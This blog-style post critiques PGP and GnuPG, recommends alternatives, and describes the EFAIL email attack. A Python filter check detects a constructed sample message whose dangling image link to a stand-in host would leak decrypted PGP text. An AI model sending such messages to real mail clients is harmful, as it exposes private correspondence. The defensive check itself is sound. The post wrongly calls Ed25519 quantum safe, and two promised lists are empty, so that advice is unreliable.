recently, it seems that people have been going absolutely wild over the Pretty Good Privacy tool (better known as PGP). some people have been saying it's bad, others saying it's good, some saying it's awful and others saying it's amazing. in this post, we'll break down together the problems with PGP, the good parts of PGP, the bad parts, the amazing parts, whether you should use it or not, and what you should use instead of it.

1. the issues

the main issue with PGP is this: it is ancient software. PGP was made before serious modern cryptography was invented, before each cryptographic task had one good and solid algorithm for it. PGP also boasts weird design choices and absurd complexity. another large issue is actually the community surrounding it; they often refuse to let go of ancient algorithms and insist on having backwards compatibility with the 1990s. as Latacora said in their "The PGP Problem" article (highly recommend reading!!), you cannot have good cryptography that is also backwards compatible with the 1990s. it does not happen.

apart from PGP itself, as said earlier, the community surrounding it is also pretty bad. GPG, an incredibly large, memory unsafe, ancient tool featuring over 56 CVEs, is called by many "the standard PGP implementation". this, again, is absolutely awful, as gnupg is incredibly insecure. i could quite literally make an entire blog post talking about the issues with gnupg. these include:

..and many, many, many more. and in spite of this, package managers still use it, thousands of people still use it, and most of them refuse to switch to blatantly better alternatives, such as sequoia or RNP.

but, let's say there's nothing wrong with PGP, and nothing wrong with gnupg. if that's so, then there's still not much reason to use it. let's say you want to send an encrypted message to a friend. pgp can do that, and can be E2EE, but so can the Signal messenger, and signal is way less complex, more modern, and has numerous privacy features such as forward secrecy, which PGP doesn't have. what about encrypting a file? age does it better. signing? signify. transporting secret files? ssh or Magic Wormhole. so, if we take away all the security issues and such, we are still left with an ancient, absurdly complex tool, which doesn't do anything better than any other tool that already exists.

2. the good

let's give pgp a break for a minute. pgp is actually a really good tool. sure, it may not be the best at what it does, but what most people use it for is one thing: identity.

the internet is insanely hard to have an identity on. impersonators are everywhere, and you can never be sure who is who. pgp fixes this by implementing a web of trust. pgp allows you to sign other people's keys, which allows you to basically say "yeah, this person is who they say they are.". basically nothing else on the internet can do this. the pgp community also often has real-life signing parties, where you can go out and meet people face to face in order to be able to trust that. Latacora's article calls this an issue, when it's not. it's an incredibly useful feature that actually fixes the identity problem on the internet, and allows you to actually know who someone is. again, basically no other tool on the internet does this. and because of how integrated PGP is, this web of trust is already well-established.

another factor that makes PGP a genuinely good tool is that it combines pretty much everything. sure, PGP may have an absurd setup ritual, but after you've set it up, you have an identity, you can sign, you can encrypt, and much more. as an all-in-one privacy tool, this is amazing. it ties in well with identity.

3. how to use it properly

so we've established the good parts of pgp, and the bad. the main bad part of pgp is the community, and the tools that people use. this section will explain to you how to use pgp safely, what tools to use, and what to definitely not do.

  1. switch implementations

    we said earlier that gnupg is awful, and pretty dangerous. so what should you use instead? there are quite a few options, with the best out of them (in my opinion) being sequoia. sequoia implements more modern tooling, is memory safe thanks to rust, and has a much smaller codebase than gnupg. it focuses on robustness, correctness, and user security. and luckily, making the move from gnupg to sequoia is even easier thanks to sequoia providing the chameleon tool, which essentially provides a gnupg-like frontend to sequoia. other options include RNP, which is arguably less secure but is faster. both are miles better than gnupg.

  2. never use it in email clients

    this is a huge one. if you are unaware, there is a vulnerability not in pgp specifically, but rather in how it is implemented in numerous email clients. essentially, since email clients can automatically decrypt PGP encrypted messages, you can sandwich an encrypted PGP message between two html tags with an image link in them. if the email client handles this badly, it will decrypt the PGP message, then request the image from the attacker's server with the decrypted PGP message inside the request, which the attacker can then read. in short, use email clients without pgp. most email clients have fixed this vulnerability, but better be safe than sorry. if you want to learn more, read the efail papers.

  3. use modern, quantum safe algorithms

    basically don't use RSA. RSA is ancient, and with the rise of quantum computing, it is actively getting weaker. you should switch to a more modern algorithm, such as Ed25519. it has smaller keys anyway.

  4. expect the worst with encryption

    always expect the worst with encryption with PGP. many PGP users often experience one of their recipients accidentally forwarding a decrypted PGP message to someone. just be careful who you send your mail to.

  5. don't use encryption for highly sensitive conversations

    in my eyes, using PGP for encrypting messages is like using a VPN. it's good if you don't need maximum privacy, but when you do need maximum privacy, it won't supply it. you can use pgp for somewhat sensitive conversations, but for highly sensitive ones, use signal.
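
the message layout from point 2, as an added example (not code from the efail papers or from any email client): a check a mail filter could run over a raw message before it is rendered. the sample message, its placeholder ciphertext and the `.invalid` hostname are constructed, and the function names are hypothetical.

```python
import re
from email import message_from_string

ARMOR = b"-----BEGIN PGP MESSAGE-----"
# a quoted src/href/background value that is still open when the part ends
OPEN_ATTR = re.compile(
    r"""<\w+[^>]*\b(?:src|href|background)\s*=\s*(["'])(?:(?!\1).)*\Z""", re.S | re.I)

def leaf_parts(msg):
    """leaf MIME parts, in the order a client would render them"""
    return [p for p in msg.walk() if not p.is_multipart()]

def body(part):
    return part.get_payload(decode=True) or b""

def is_encrypted(part):
    return (part.get_content_type() == "application/pgp-encrypted"
            or ARMOR in body(part))

def leaves_attribute_open(part):
    if part.get_content_type() != "text/html":
        return False
    return bool(OPEN_ATTR.search(body(part).decode("utf-8", "replace").rstrip()))

def suspicious_sandwich(raw):
    """true if an html part with a dangling url directly precedes an encrypted part"""
    parts = leaf_parts(message_from_string(raw))
    return any(leaves_attribute_open(a) and is_encrypted(b)
               for a, b in zip(parts, parts[1:]))

# constructed sample: placeholder ciphertext, reserved .invalid hostname
SAMPLE = """\
Content-Type: multipart/mixed; boundary="B"

--B
Content-Type: text/html

<img src="http://collector.example.invalid/
--B

-----BEGIN PGP MESSAGE-----
(placeholder ciphertext)
-----END PGP MESSAGE-----
--B
Content-Type: text/html

">
--B--
"""
```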

4. what to use instead

although pgp is a good tool, it does have its numerous issues. this section will go over each use of pgp, and a related tool you can use to replace it.

conclusion

in conclusion, yes, PGP does have its numerous issues, but a lot of the other issues associated with it are actually mostly caused by the community. good implementations of PGP do actually exist, just most remain unused compared to the insecure alternatives. in short, don't use gpg.